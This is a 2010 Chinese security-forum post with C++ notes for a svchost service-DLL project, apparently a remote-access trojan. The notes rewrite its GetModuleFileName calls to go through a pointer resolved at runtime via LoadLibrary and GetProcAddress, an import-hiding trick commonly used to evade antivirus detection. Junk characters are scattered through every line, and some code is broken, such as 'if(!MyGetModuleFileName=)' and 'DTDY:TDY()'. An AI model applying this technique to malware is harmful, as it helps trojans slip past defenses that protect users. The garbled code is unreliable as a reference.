Board logo

标题: [原创文章] 全局动态调用 [打印本页]
作者: ice_xke    时间: 2010-10-19 12:30     标题: 全局动态调用

全局动态调用笔记4 o9 |( @' j$ @+ @6 x
svchost files工程->插入->类(Generic Class DTDY)->DTDY.cpp DTDY.h0 A* T6 |/ I  h4 j8 U  w. ^# p  ^
----------------------------------------
; B" C6 g7 {! R; L' `( tDTDY.h:" s' g/ P8 Y3 e( q8 T; P

9 |3 M/ M$ c# j5 @/ S: d" @& v#if _MSC_VER>1000" _/ G' ?% R& d" ^/ _- ?
#pragma once
% b; n; [$ y8 }4 \#endif //_MSC_VER>1000
8 o' B7 p9 d$ q  f3 w#include<windows.h>
' t2 b+ I2 }$ x$ k$ q% ]: \# r  L4 o7 u7 R# n- |. x. r9 z
typedef DWORD (__stdcall *pGetModuleFileNameA)(HMODULE,LPSTR,DWORD);3 L; X2 }* p& x5 N5 _
class DTDY0 a' R* ^0 ?$ C
{
8 o- `/ ?0 W9 B6 Q; wpublic:
" y0 ]$ A" U4 a) E$ T8 rDTDY();, J# U5 S0 e, l4 s* U9 d3 c
virtual ~DTDY();8 H$ _0 f7 F  Z4 l# @
public:9 O) C2 C" Z1 S; Z  y  y
static pGetModuleFileNameA MyGetModuleFileName;0 _% r% Q# s, E, H
static BOOL FunInitiallization();
( _, H7 y! ?0 O  ?( a% @7 n};
0 i: l, k+ L2 l0 a! u#endif6 y- @& i- B; U- V) j
----------------------------------------; h8 ?# W& d, r) j4 A) g

, z2 F$ {$ l. L: f" \: C& h9 JDTDY.cpp:
3 x% c& h$ @2 o  J1 Q) I! i
' j  B/ i  t+ B: D& a0 r4 j#include "DTDY.h", \2 N: z5 o1 h6 {
pGetModuleFileNameA DTDY::MyGetModuleFileName=NULL;) c' w, h! p7 ]9 \) K: x2 s
DTDY:TDY()# E# g) n$ G- w  `
{9 N  a; F3 ]# ?8 X
}
) {" ?5 m* {4 M" t6 {DTDY::~DTDY()
0 t4 R" i" U7 I* }, [{
' i4 @" e1 D% u1 k  B2 M- U}
# _, i% w  B7 f  kBOOL DTDY::FunInitiallization()
3 m& O1 Y8 M, b8 `5 e2 V{  i+ S/ p! w$ c* o2 O
HMODULE hModule=LoadLibrary("kernel32.dll");
0 M: a, K3 h# ?6 ?- W! CMyGetModuleFileName=(pGetModuleFileNameA)GetProcAddress(hModule,"GetModuleFileNameA");
* g- [  I% G% X/ e  K. V6 Zif(!MyGetModuleFileName=) return FALSE;; x# Y: l& ]+ c+ R1 H5 @& y

. A" m# ~( ]# c/ i* q0 X3 g/ Areturn TRUE;
, s% Y) g" q- b6 Y4 p, @9 L5 Y}+ {, K/ _" z7 ~4 P- v, [  f
----------------------------------------
7 y/ |  L8 G$ s) w  Ysvchost.cpp:
  i- W9 W" z5 O8 B, L3 ^' T9 {* \1 R2 a4 h
$ p  s5 W1 z5 ~$ R& O#include "DTDY.h", j3 E/ ~  w% K# z1 U) M0 Y. R4 r
( L7 t- K7 K/ {1 N" ]
BOOL APIENTRY DllMain(HANDLE hModule,DWORD ul_reason_for_call,LPVOID lpReserved)- B3 H" e3 A: K! T9 n
{4 q' ~0 R( w1 r6 [0 y9 Y
switch(ul_reason_for_call)( F5 X/ M4 w4 w" m1 s
{) ^, t+ y3 J2 I! [- r7 ]
case DLL_PROCESS_ATTACH:
* P, N7 J/ f7 s7 p& Nif(!DTDY::FunInitiallization()) return FALSE;, X, Q) q% w, I5 x3 \( v. l

6 l# e+ Y9 s" _  C9 O) Y) Pbreak;
* {; M0 o# y, h}8 i( h+ ]5 y' v& e) j& }! d; q
}3 _9 g: S6 W7 V. s# T$ M6 ~
* C/ j& R/ Y' q& g7 L% P1 c
4 c9 H  q6 A2 U5 L: s) J
GetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));->goto def$ m. z) D, ]) r; o) O( G
改写为. j; ^: x/ u( M
DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));
$ R* x& V) P) i+ H* p----------------------------------------9 ?0 t3 S* f% C" w
KernelManager.cpp:- j9 _- Z7 u2 K7 {7 p, u* h
- t' O0 z* W/ L' J3 W
#include "../DTDY.h"
; d! o5 k6 h% _* t+ ^* W; x  z3 JGetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));0 e4 W, C! {$ q' z
改写为
: s' o' \' B: Z7 z; V! I- S; EDTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));
! h5 w5 |, L5 z! Z% T----------------------------------------



欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com./) Powered by Discuz! 7.2